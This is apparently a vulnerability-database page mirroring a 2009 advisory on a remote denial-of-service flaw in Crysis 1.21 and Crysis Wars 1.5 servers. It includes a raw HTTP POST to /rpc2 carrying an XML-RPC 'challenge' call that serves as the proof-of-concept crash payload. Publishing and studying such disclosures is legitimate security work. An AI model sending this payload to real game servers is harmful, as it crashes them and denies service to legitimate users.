Crysis 1.21/1.5 - HTTP/XML-RPC Service Access Violation Remote Denial of Service

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057922 漏洞类型
发布时间 2009-06-20 更新时间 2009-06-20
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Multiple CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/33096
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/35735/info

Crysis is prone to a remote denial-of-service vulnerability because the application fails to handle exceptional conditions.

An attacker can exploit this issue to crash the affected application, denying further service to legitimate users. Given the nature of this issue, the attacker may also be able to run arbitrary code, but this has not been confirmed.

The following are affected:

Crysis 1.21 and prior versions
Crysis Wars 1.5 and prior versions 

POST /rpc2 HTTP/1.1
Content-Length: 90

<?xml version="1.0"?>
<methodCall>
  <methodName>challenge</methodName>
</methodCall>